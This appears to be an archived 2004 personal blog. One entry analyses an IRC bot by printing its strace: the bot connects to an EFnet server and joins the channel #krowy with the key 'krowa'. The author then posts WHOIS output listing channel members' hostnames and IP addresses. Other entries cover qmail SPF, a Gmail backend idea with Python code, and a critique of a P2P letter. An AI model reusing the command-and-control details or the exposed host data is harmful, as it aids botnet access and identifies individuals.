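    r'2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)',
    r'2808  close(4)                          = 0',
    r'2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0',
    r'2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)',
    r'2808  close(4)                          = 0',
]

if __name__ == "__main__":
    for q in dns_queries(SAMPLE_TRACE):
        print(hex(q["id"]), q["name"], q["partial_label"], q["complete"], q["qtype"], q["qclass"])
```
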

2837  connect(3, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("193.109.122.77")}, 16) = 0
2837  setsockopt(3, SOL_SOCKET, SO_LINGER, NULL, 0) = -1 EINVAL (Invalid argument)
2837  setsockopt(3, SOL_SOCKET, SO_REUSEADDR, NULL, 0) = -1 EINVAL (Invalid argument)
2837  setsockopt(3, SOL_SOCKET, SO_KEEPALIVE, NULL, 0) = -1 EINVAL (Invalid argument)
2837  write(3, "NICK MXQC\nUSER HNMKFQ localhost localhost :LTQQEFD\n", 51) = 51
2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1200, 0})
2837  recv(3, "NOTICE AUTH :*** Looking up your hostname...\r\nNOTICE AUTH :*** Checking Ident\r\nNOTICE AUTH :*** Found your hostname\r\n", 4096, 0) = 117
2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1190, 600000})
2837  recv(3, "NOTICE AUTH :*** No Ident response\r\n", 4096, 0) = 36
2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 830000})
2837  recv(3, "PING :936DFE7C\r\n", 4096, 0) = 16
2837  write(3, "PONG :936DFE7C\n", 15)  = 15
2837  select(4, [3], NULL, NULL, {1200, 0}) = 1 (in [3], left {1199, 820000})
2837  recv(3, ":irc.efnet.nl 001 MXQC :Welcome to the EFnet Internet Relay Chat Network MXQC\r\n", 4096, 0) = 79
2837  write(3, "MODE MXQC -xi\n", 14)   = 14
2837  write(3, "JOIN #krowy :krowa\n", 19) = 19
...

So it joins a private IRC channel. I can do that. A @google.com address got me banned pretty quickly. But not before I got a whois on everyone there:

--- [FDMYSGLM] (GIWcF7CNSH@badboy.icyhost.com) : UUTIDJJH
--- [FDMYSGLM] @#krowy 
--- [FDMYSGLM] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- FDMYSGLM 66.98.130.9 :actually using host
--- [FDMYSGLM] idle 49:13:19, signon: Tue Aug 10 15:54:49
--- [FDMYSGLM] End of WHOIS list.
--- [forger] (konrad@aay116.neoplus.adsl.tpnet.pl) : I'm too lame to read mirc.hlp
--- [forger] #hihaho #test45 @#krowy 
--- [forger] irc.efnet.pl :Discover a lost art - www.marillion.com
--- [forger] End of WHOIS list.
--- [its`me] (~ludziu@nat-0.infoland.int.pl) : ^=^
--- [its`me] @#krowy 
--- [its`me] irc.efnet.pl :Discover a lost art - www.marillion.com
--- [its`me] End of WHOIS list.
--- [MQJJEBR] (~WTKC@pc-212-51-219-2.p.lodz.pl) : DILLEUN
--- [MQJJEBR] @#krowy 
--- [MQJJEBR] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- MQJJEBR 212.51.219.2 :actually using host
--- [MQJJEBR] idle 49:13:27, signon: Tue Aug 10 16:01:19
--- [MQJJEBR] End of WHOIS list.
--- [ori00n] (h4x0r@dial-770.wroclaw.dialog.net.pl) : l33t
--- [ori00n] #test45 #cc @#krowy 
--- [ori00n] irc.efnet.pl :Discover a lost art - www.marillion.com
--- [ori00n] End of WHOIS list.
--- [YDMOCCRO] (~KQFU@banks.su.nottingham.ac.uk) : JHASTZIH
--- [YDMOCCRO] @#krowy 
--- [YDMOCCRO] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- YDMOCCRO 128.243.90.87 :actually using host
--- [YDMOCCRO] idle 49:13:32, signon: Tue Aug 10 16:48:28
--- [YDMOCCRO] End of WHOIS list.
--- [agl] (~agl@216-239-45-4.google.com) : agl
--- [agl] #krowy 
--- [agl] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- agl 216.239.45.4 :actually using host
--- [agl] idle 00:00:49, signon: Fri Aug 13 14:07:34
--- [agl] End of WHOIS list.
--- [MITPIXPN] (~BJSAQXGU@211.239.197.130) : MIHSH
--- [MITPIXPN] #krowy 
--- [MITPIXPN] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- MITPIXPN 211.239.197.130 :actually using host
--- [MITPIXPN] idle 00:18:13, signon: Fri Aug 13 13:50:23
--- [MITPIXPN] End of WHOIS list.
--- [NKKXLTC] (www-data@rei.animehq.hu) : WSOV
--- [NKKXLTC] #krowy 
--- [NKKXLTC] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- NKKXLTC 195.70.50.20 :actually using host
--- [NKKXLTC] idle 00:19:31, signon: Fri Aug 13 13:49:00
--- [NKKXLTC] End of WHOIS list.
--- [PHQW] (~FNWDDYH@dsl-213-023-046-090.arcor-ip.net) : SYEV
--- [PHQW] #krowy 
--- [PHQW] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- PHQW 213.23.46.90 :actually using host
--- [PHQW] idle 00:11:23, signon: Fri Aug 13 13:57:17
--- [PHQW] End of WHOIS list.
--- [VQMVYOHE] (~WEEBA@211.239.197.130) : HBQFDHTF
--- [VQMVYOHE] #krowy 
--- [VQMVYOHE] irc.efnet.nl :Business Internet Trends IPv4/IPv6 EFNet server
--- VQMVYOHE 211.239.197.130 :actually using host
--- [VQMVYOHE] idle 00:18:09, signon: Fri Aug 13 13:50:34
--- [VQMVYOHE] End of WHOIS list.

Looks like forger is running the game as he quickly kicks the jailed moo bot that I'm running (also from @google.com). He then changes his nick to shitniz, like it will help.

But thankfully moo seems to do exactly what it says on the tin; so probably not a problem. Oh, and that channel is now invite only. I guess he got scared. shitniz is still there though.

Thu Aug 12 19:51:02 PDT 2004

Patch to add SPF to Gentoo qmail.

Based on http://www.saout.de/misc/spf/

Thu Aug 12 17:16:39 PDT 2004

Did you know that .org pushes now happen about every 5 minutes? I was certainly pretty surprised last night. Now if only they didn't have silly registration and server number restrictions at the gTLD level the DNS system might not be a complete pile of doggy poo.

And the reason why I was playing with DNS is that IV now has a new mail server. Say hello to zool.imperialviolet.org everyone, the third server to have an .imperialviolet.org name (I wonder if anyone here remembers tzu and metis?). Hopefully this should fix the mail bouncing problems that dodo was having. And, if anyone wants hosting for mail servers etc now is the time to ask.

The switch of servers has broken automatic email bots (that's comments and keyverify), but I'm running them manually at the moment so you can still use them all the same. And boy do people use keyverify a lot. I wasn't expecting any traffic but I've had to deal with about 10 messages today from that.

Gmail backending

I was being a little silly yesterday. If one was going to implement a new backend for the gmail javascript, there's an obvious choice ... gmail. Gmail does a perfect job of storing and sorting mail, just forward the queries onto them!

Before you wonder what the hell the point of re-backing gmail only to forward them to the real gmail is, remember the motivation. I want email messages to be sent from the right place, with the right From address, so all I have to do is intercept the "send email" POST and a) send the email from zool, b) send it on to gmail with a blackhole email address.

That's it. Now, if you don't like the idea of gmail storing your email then you really do have to do the whole thing. But I know that gmail stores lots of copies of my mail and that they aren't profiling it. For the moment I'm happy with Google managing my email and this simple solution is great (I think that would go for many people).

Thu Aug 12 13:13:09 PDT 2004

But after a while, someone needs to make a change, and inevitably, they break your code. Do you suppose they'll notice? Not likely. But you will, when google.com starts serving elephant porn on 11 million searches. Stop elephant porn before it starts by writing unit tests for all your code.

Wed Aug 11 19:45:51 PDT 2004

Why hasn't anyone back-ended gmail? Seriously, it's a client side app, that means you can take the javascript and reimplement the server. It's not that hard! Lots of people seem to be doing different clients for gmail (injectors, notifiers etc) - but I want a different backend!

I don't want my address to be @gmail (and Reply-To isn't good enough). At the moment the server which handles imperialviolet.org email is upset so I don't even have my Reply-To set. But I'm switching to a different server soon and I want a gmail server to install!

Seriously, it's easy, I implemented a NULL backend for gmail in about 30 minutes. The list of email is static and nothing actually works but all the data looks like:

D(["t",["fe4e30d37ca51d9",0,0,"7:11am","\<span id=\'_user_rmages@linux-azur.org\'\>Rene Mages\</span\>","&nbsp;","Software Patents : Postcard Action",
  "Hi all, Probably, the EU Software patent Directive should return to the European Parlement during &hellip;",[]
  ,"","fe4e30d37ca51d9",0]
]);

It's not that tough. Python provides mailbox parsing, IMAP clients etc (if you want).

Unfortunately, I don't have the time.
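A sketch of the Python side of such a backend, added here as an example and not code from this post: it turns parsed mail into the D(["t", ...]) row shape shown above. The meaning of each cell, the hash-derived stand-in id and the assumption that text cells are rendered as HTML are all guesses from that one sample. Mail headers and bodies are attacker-controlled, so the text is HTML-escaped and the JS literal uses the same \< escaping as the sample.

```python
import email, hashlib, html, json
from email.utils import parseaddr, parsedate_to_datetime

# Constructed sample mail; the second Subject and body are deliberately hostile.
SAMPLE = [
    "From: Rene Mages <rmages@linux-azur.org>\n"
    "Date: Wed, 11 Aug 2004 07:11:00 -0700\n"
    "Subject: Software Patents : Postcard Action\n\n"
    "Hi all, Probably, the EU Software patent Directive should return.\n",
    "From: Mallory <mallory@example.org>\n"
    "Date: Wed, 11 Aug 2004 15:02:00 -0700\n"
    "Subject: </script> \"quoted\" it's\n\n"
    "<img src=x> body text\n",
]

def js_string(s):
    """Quote s as a JS string literal that cannot terminate an inline <script>."""
    lit = json.dumps(s)  # escapes quotes, backslashes, control and non-ASCII chars
    # Same angle-bracket escaping as the page's sample: "\<" is just "<" to JS.
    return lit.replace("<", "\\<").replace(">", "\\>")

def thread_row(raw):
    """One row in the cell order of the page's sample (cell meanings are assumed)."""
    msg = email.message_from_string(raw)
    name, addr = parseaddr(msg["From"])
    # Stand-in id: 15 hex digits like the sample; a real backend would assign ids.
    tid = hashlib.sha1(raw.encode()).hexdigest()[:15]
    when = parsedate_to_datetime(msg["Date"]).strftime("%I:%M%p").lstrip("0").lower()
    # Header and body text is attacker-controlled and ends up as HTML: escape it.
    sender = "<span id='_user_%s'>%s</span>" % (html.escape(addr), html.escape(name or addr))
    snippet = html.escape(" ".join(msg.get_payload().split())[:90]) + " &hellip;"
    return [tid, 0, 0, when, sender, "&nbsp;", html.escape(msg["Subject"]),
            snippet, [], "", tid, 0]

def render_thread_list(raws):
    """Serialise rows as the D(["t", ...]); call in the shape shown on the page."""
    rows = []
    for raw in raws:
        cells = (js_string(c) if isinstance(c, str) else json.dumps(c)
                 for c in thread_row(raw))
        rows.append("[" + ",".join(cells) + "]")
    return 'D(["t",' + ",".join(rows) + "]);"

if __name__ == "__main__":
    print(render_thread_list(SAMPLE))
```

Reading real mail would replace SAMPLE with messages from the standard library's mailbox or imaplib modules.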

Sun Aug 8 14:48:19 PDT 2004

Storage for archive.org

Fri Aug 6 10:16:22 PDT 2004

A quick commentary on the letter sent by many attorneys general to the `peer-to-peer software' producers.

At present, P2P software has too many times been hijacked by those who use it for illegal purposes to which the vast majority of our consumers do not wish to be exposed.

I hate to point out that the reason that most people use P2P networks is to be exposed to these `illegal purposes'. Look at the usage numbers for Napster before and after it went `legal'.

P2P file-sharing technology works by allowing consumers to download free software that enables them to directly share files stored on their hard drive with other users. This type of direct access to one's computer differentiates P2P file-sharing technology from garden-variety e-mail accounts and commercial search engines such as Google and Yahoo.

As opposed to the bleeding obvious differences between P2P and email/search engines?

One substantial and ever-growing use of P2P software is as a method of disseminating pornography, including child pornography.

Yep. True at least.

Consequently, P2P users need to be made aware that they are exposing themselves, and their children, to widespread availability of pornographic material when they download and install P2P file-sharing programs on their computers.

While sensible, I'm guessing that most people realise this. Esp. after their first IE session, after which they are left with dozens of popup windows of porn.

Furthermore, P2P file-sharing technology can allow its users to access the files of other users, even when the computer is "off".

Seriously, no. It really can't.

P2P users, including both home users and small businesses, who do not properly understand this software have inadvertently given other P2P users access to tax returns, medical files, financial records, personal e-mail, and confidential documents stored on their computers. ... Consequently, P2P users need to be properly educated so that they will not inadvertently share personal files on their hard drives with other users of your P2P file-sharing technology.

And this is small fry when compared to the amount of information leaked by viruses, photocopiers and leaving one's briefcase on the roof of the car as you drive away. (And, in the case of the British secret service, leaving your laptop in the pub). Since when do attorneys general bother themselves with people being stupid?

The illegal uses of P2P technology are having an adverse impact on our States consumers, economies, and general welfare.

Of course, this statement is asserted without justification and is debatable at best.

P2P file-sharing programs also are being used to illegally trade copyrighted music, movies, software, and video games, contributing to economic losses. The Business Software Alliance estimates that its members lost $13 billion in revenue last year due to software piracy. According to a February 20, 2004 CNN article, U.S. software companies lose up to $12 billion a year in piracy according to the Software and Information Industry Association. Music companies lost more than $4.6 billion worldwide last year, according to the RIAA [Recording Industry Association of America] and movie industry officials pegged their annual losses from bootlegged films at more than $3.5 billion.

At least here they give their sources, and what independent sources they are too. Generally `losses', as calculated in these figures, are an estimate of the number of copied works (rounded up) times the retail cost. Which is assuming that every download is a lost sale.

We would ask you to take concrete and meaningful steps to avoid the infringement of the privacy and security of our citizens by bundling unwanted spyware and adware with your software.

I don't think they actually meant what they wrote here, but it's at least a little ray of light if I'm reading it (in)correctly.

Encryption only reinforces the perception that P2P technology is being used primarily for illegal ends. Accordingly, we would ask you to refrain from making design changes to your software that prevent law enforcement in our States from investigating and enforcing the law.

I think that law-enforcement already has plenty of powers to deal with this - up to and including installing keyloggers on suspects' computers.

We believe that meaningful steps can and should be taken by the industry to develop more adequate filters capable of better protecting P2P parents and children from unwanted or offensive material. Not warning parents about the presence of, and then reasonably providing them with the ability to block or remove, obscene and illegal materials from their computers is a serious threat to the health and safety of children and families in our States.

What the hell are `P2P parents'? Most of the parents I know are of the regular kind, and that kind are perfectly capable of supervising their children.
